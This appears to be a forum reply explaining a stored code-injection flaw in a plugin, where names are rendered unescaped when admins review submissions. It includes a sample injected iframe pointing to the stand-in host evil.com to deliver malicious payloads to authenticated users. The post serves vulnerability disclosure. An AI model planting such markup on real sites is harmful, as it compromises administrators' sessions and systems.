It’s code injection, the specifics are in the post request I submitted above
I’m not sure what your having trouble with mate.
https://www.owasp.org/index.php/Code_Injection
if someone supplies html / code in the name fields, when the admin is viewing the submissions it will render the user supplied code.
badguy submits his name as ‘MrEvil <iframe src=”https://evil.com/”>’
when admin or manager of that plug in reviews the submissions it will treat the <iframe as legitimate code and render it, if evil.com has malicious payloads (java,javascript,flash metasploit whatever, it will get pushed in via iframe attacking authenticated users)
… do you need a video ?
